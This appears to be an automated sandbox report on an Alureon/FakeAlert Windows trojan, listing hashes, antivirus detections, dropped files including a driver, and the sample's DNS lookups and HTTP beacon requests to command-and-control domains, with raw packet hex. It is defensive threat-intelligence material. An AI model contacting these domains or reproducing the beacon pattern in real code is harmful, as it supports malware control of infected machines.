Analysis Date: 2013-11-22 01:24:04
MD5: dd3e484e14e30b72b023581722cab696
SHA1: 19828fa9ab7e9e6e31847aa71167ebfbc102762b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .itext  md5: 71ff1ed14a39267514458176912aec83 sha1: 9ecb93933c3ac7b823a702ddc61c40f747eb58ad size: 12288
Section .lko2l1 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 (these are the MD5/SHA1 of empty input, consistent with a zero-length section)
Section .lko1l1 md5: d72c7eaedacfa026ab5c6e9751cacc5a sha1: e5d1089f71303eacc64ed21a59b6113c16af9f91 size: 69120 (.lko1l1/.lko2l1 are non-standard section names, consistent with the generic crypter detection TR/Crypt.XPACK.Gen below)
Section .idata  md5: 6397f853e615d8d55c09cbdc4d34ed17 sha1: f1b7e0e9ec5e9d4213ef838b429341666c1e18d3 size: 2048
Section .rsrc   md5: 84567702ed0304b5b8e383a1429ece0d sha1: 40740796861d5dde6e58112a085afd7851e44b64 size: 1024
Timestamp: 2009-09-02 21:02:15 (PE header compile timestamp; this field is attacker-controlled and need not reflect when the sample was actually built)
PEhash: 4c7f418df6d4c90ba03a0dbc524a7b8b20baf3a8
AV avira: TR/Crypt.XPACK.Gen
AV msse: Trojan:Win32/Alureon.CW
AV avg: FakeAlert.MN
AV mcafee: FakeAlert-IC

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\UAC2af3.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\UAC2b31.tmp
Starts Service: spooler (the spoolsv.exe process listed below is the one that subsequently writes the UACd.sys driver file)

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File: globalroot\systemroot\system32\UACxxomfrgfhq.log
Creates Process: C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1112

Process
↳ Pid 1212

Process
↳ Pid 1848

Process
↳ Pid 1160

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\ (captured with a trailing NUL terminator, shown as \x00)
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LogonTime ➝ NULL
Creates File: WMIDataDevice
Creates File: globalroot\systemroot\system32\drivers\UACd.sys (a .sys file under system32\drivers, written by the spooler service process that the sample started; the UAC-prefixed file names are consistent with the Alureon detection in Static Details)

Process
↳ C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

Creates File: PIPE\lsarpc

Network Details:

DNS: shouldfind.com
Type: A
209.222.14.3
DNS: perlineportal.com
Type: A
208.73.210.29
DNS: belowsearch.com
Type: A
209.222.14.3
DNS: online4stats.org
Type: A (no address recorded)
DNS: online4traffic.org
Type: A (no address recorded)
DNS: powerfulstat.com
Type: A (no address recorded)
DNS: webmobilesearch.net
Type: A (no address recorded)
DNS: tlcstatistic.com
Type: A (no address recorded)
DNS: traffic4stats.org
Type: A (no address recorded)
HTTP GET: http://shouldfind.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://perlineportal.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://shouldfind.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://belowsearch.com/banner/crcmds/main
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
(The URI path /banner/crcmds/main and the User-Agent string are identical across all three hosts, and shouldfind.com and belowsearch.com resolve to the same address; the raw pcap below shows each request is HTTP/1.0 carrying only User-Agent, Host and Pragma: no-cache headers, which makes the combination usable as a network signature.)
Flows: TCP 192.168.1.1:1031 ➝ 209.222.14.3:80
Flows: TCP 192.168.1.1:1032 ➝ 208.73.210.29:80
Flows: TCP 192.168.1.1:1033 ➝ 209.222.14.3:80
Flows: TCP 192.168.1.1:1034 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2073686f 756c6466 696e642e 636f6d0d    shouldfind.com.
0x00000090 (00144)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000a0 (00160)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2073686f 756c6466 696e642e 636f6d0d    shouldfind.com.
0x00000090 (00144)   0a507261 676d613a 206e6f2d 63616368   .Pragma: no-cach
0x000000a0 (00160)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   2062656c 6f777365 61726368 2e636f6d    belowsearch.com
0x00000090 (00144)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x000000a0 (00160)   68650d0a 0d0a                         he....

0x00000000 (00000)   47455420 2f62616e 6e65722f 6372636d   GET /banner/crcm
0x00000010 (00016)   64732f6d 61696e20 48545450 2f312e30   ds/main HTTP/1.0
0x00000020 (00032)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000030 (00048)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000040 (00064)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000050 (00080)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000060 (00096)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000070 (00112)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000080 (00128)   20706572 6c696e65 706f7274 616c2e63    perlineportal.c
0x00000090 (00144)   6f6d0d0a 50726167 6d613a20 6e6f2d63   om..Pragma: no-c
0x000000a0 (00160)   61636865 0d0a0d0a                     ache....


Strings (extracted from the binary; most entries are packed-data noise. Items worth noting: an embedded application manifest with requestedExecutionLevel level="requireAdministrator", i.e. the sample asks for elevation on launch; imported API names GetProcAddress, VirtualProtectEx and SetNamedPipeHandleState; and the non-standard section names .lko1l1 and .lko2l1.)
FQPK
0JVr=|d
'0lY0-
1DR.s+
4^Lusg
4xav"m
5dq0<C
5Okp"W-
67)gy9h
6cu@	8
7Dt.E}
>7Yjp2G
 &-8IhM
8	PAD<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><ms_asmv2:trustInfo xmlns:ms_asmv2="urn:schemas-microsoft-com:asm.v2"><ms_asmv2:security><ms_asmv2:requestedPrivileges><ms_asmv2:requestedExecutionLevel level="requireAdministrator"></ms_asmv2:requestedExecutionLevel></ms_asmv2:requestedPrivileges></ms_asmv2:security></ms_asmv2:trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
8U#Y}lR7
?90zg7
9*-C%c\|
.;a> !
abpvkv
)Aib>0
A@jVcLk
AoaB&1|4
B2!8le
bsyopgiva.dll
[BZxOe .q
c^p-dR
CreateLlrdodcd
D2r2(`
d:Ds:?^
DestroyCaret
dM;Gzp(
E^QK>j
?ERS:"
ExitProcess
F	J^5@W
F'<k[g
G1|_3"
g6w_*2"
GetActiveWindow
GetCurrentProcess
GetProcAddress
GetWindowLongW
GFL=8U
!Gs|4T
HOH5c$
h!)R(&x:
i'^ax4
@.idata
}i$<DCn0
iGh(Lk
.itext
	j(A5"B@
JI"]^F+
:k{9J.
Keb%?:U
kernel32.dll
kG^5#S
Kmvrofsgxy
kpa7wG9Gc
KP=cIA*
Kv)8`TU
(,kVM\
K}zgFY
<l9{_+mY
LH'4r:
lj=r!Q
:l~@Kcv)
@.lko1l1
`.lko2l1
LlEAlK
lphT<Y
L"qcrs"
l@'V	?CX-
%l,Y_B8T
{M#&8x
-!MAn&
m{u'Yh
?n2'v'"
.N7GBT
NA5a"H
	n!?fP
nftxf=
N)	HE7a
&NK6rl
ntdll.dll
o}_C~mN6O
oRhiJ$I
P~3b&O
Pg *<>V(
`PH$DH
q,K=_5Z
R6XpbN
r.HAy(
Ri;CCmB
SetNamedPipeHandleState
s~hM!m[xD
s>?j#i
sQ};iUr+
ssz8yr
S^zzP^
(>!T;]
t <7.yY
td66_P<r
td8=CF
`T|g[@f
!This program cannot be run in DOS mode.
$toRwZ@P
TS j>?
?TWcRF
TY<Y6w
\U8nU;
u{_Aj-y
u$<|Bk
u,Rxnyw
user32.dll
UY#=y:
V]9%S^
VirtualProtectEx
	]Vlo['
VPqKG-
V`VP1A
!w02Q!<
w"""6]
?wanLP%f
*Wb\mnc
W/rD/)S
wTM9XJ
Xq:){R%
+~XQ,w
XVA[K7#
YATLmV
`yjgPU
y?L_0H
y!QGKm!,
Y'Y[nNS
Z0A@}F
!z6	;Yr
ZdBr=}p]
.ZoRG@|
Z&qbe+v
Z{VVg}
ZZUr[k@